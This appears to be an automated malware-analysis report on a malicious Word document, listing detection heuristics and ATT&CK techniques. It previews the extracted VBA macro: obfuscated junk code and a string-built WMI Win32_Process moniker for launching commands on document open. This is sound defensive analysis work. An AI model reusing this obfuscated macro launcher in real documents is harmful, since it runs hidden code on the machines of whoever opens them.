Verdict: MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing a VBA macro. The macro uses GetObject and CreateObject to reach the WMI Win32_Process class, indicating an intent to execute arbitrary code. The presence of an AutoOpen macro further suggests execution as soon as the document is opened.
Heuristics (8)
- ClamAV: Doc.Malware.Dpzn-6865731-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Dpzn-6865731-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: ff10781d62625c89ed3797707e00adaa38430a844fb40b18a23fa4b962a08ce2) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 59882 bytes |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "w2_23_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "L674369_"
Function K_8_4__9()
Select Case r648146
Case 126304089
s_21_206 = Log(s_7_902)
m8_287__ = CDate(591794363)
a335_327 = Fix(571383260 + 219603384 + u67__4 - Oct(980013037))
l383__ = Cos(575180968 - Sqr(591490181 - Atn(982722253)) - 159626394 + 52174952)
End Select
Select Case K_3__2__
Case 510689917
u744716 = Log(G390523)
b90__41_ = CDate(907887252)
q02_8_8 = Fix(887055824 + 250168166 + C6391270 - Oct(839325539))
z_2_1914 = Cos(503181716 - Sqr(151443950 - Atn(60775589)) - 637051213 + 592479286)
End Select
Select Case o_17_7
Case 529318114
T60890_ = Log(w_74__6_)
E_9_06 = CDate(994322538)
h_47_22 = Fix(593716621 + 899057164 + W3__38 - Oct(822523561))
E1_630__ = Cos(598628611 - Sqr(8575900 - Atn(98442885)) - 605570074 + 316295651)
End Select
Select Case v015__6_
Case 119678662
d42_0__ = Log(j795__)
S3_234_ = CDate(896711647)
W__6_946 = Fix(610829900 + 275177768 + w1_5_72 - Oct(715675999))
L_6_6561 = Cos(271667209 - Sqr(945602782 - Atn(469718774)) - 164760095 + 481304728)
End Select
Select Case l__458
Case 706093281
G0991130 = Log(N_0_0277)
m1_78_52 = CDate(16496647)
c469___5 = Fix(383423189 + 667902766 + u461_33_ - Oct(48605504))
B2_2130 = Cos(101831635 - Sqr(647120975 - Atn(84278991)) - 248461459 + 707669980)
End Select
Select Case r6992169
Case 741917481
z9_1_0 = Log(m_17_5)
A3295_2_ = CDate(82731819)
J977_8 = Fix(680827371 + 139995649 + z_216__ - Oct(798428670))
N_56703 = Cos(9856 - Sqr(242852637 - Atn(539749946)) - 891111595 + 933033346)
End Select
Select Case t30_56
Case 592406003
o_0_42 = Log(I_175_)
J120848 = CDate(402128769)
s70_5_1 = Fix(429882151 + 535533231 + R0012_ - Oct(660706300))
d4623580 = Cos(589457050 - Sqr(526297301 - Atn(326702811)) - 259196395 + 265703178)
End Select
End Function
Function j__020(Q1719__3, i474_5)
On Error Resume Next
Select Case w92_1_
Case 118525464
s___114 = Log(M2_2_33)
Y0663__ = CDate(108034908)
X0___692 = Fix(718985533 + 127122563 + U__5_6 - Oct(865018474))
d569_279 = Cos(953491808 - Sqr(82360092 - Atn(922630522)) - 136754372 + 352110443)
End Select
Select Case I2_902_1
Case 142352362
Q_31_2 = Log(f905418)
j_51052 = CDate(654124068)
D4_96_13 = Fix(557866621 + 516810733 + l__238 - Oct(758471750))
H53644_ = Cos(612568808 - Sqr(596617279 - Atn(12249210)) - 357186181 + 698380006)
End Select
Select Case R_3__2
Case 733096804
A_4__59 = Log(S816__)
J_5882 = CDate(25045746)
U7853936 = Fix(172737548 + 341305758 + D62_61_ - Oct(192992065))
U00___ = Cos(823251568 - Sqr(466802738 - Atn(623606651)) - 192791008 + 388210032)
End Select
O1_161 = L10517 + "winmgmts:Win32" + "_ProcessStartup" + J597_154
Select Case s_____
Case 236791398
r_8586_1 = Log(H3_2_23)
A32_761 = CDate(740356675)
o6686___ = Fix(926189341 + 286828468 + A37812 - Oct(777091277))
q4__9__ = Cos(123434741 - Sqr(902862888 - Atn(485829908)) - 687825042 + 860295545)
End Select
Select Case i___83
Case 436626345
c6_7_6 = Log(t21___)
M__246 = CDate(164964545)
P_7__468 = Fix(608738104 + 510243722 + W__988_4 - Oct(224020176))
i_5492 = Cos(7263
... (truncated)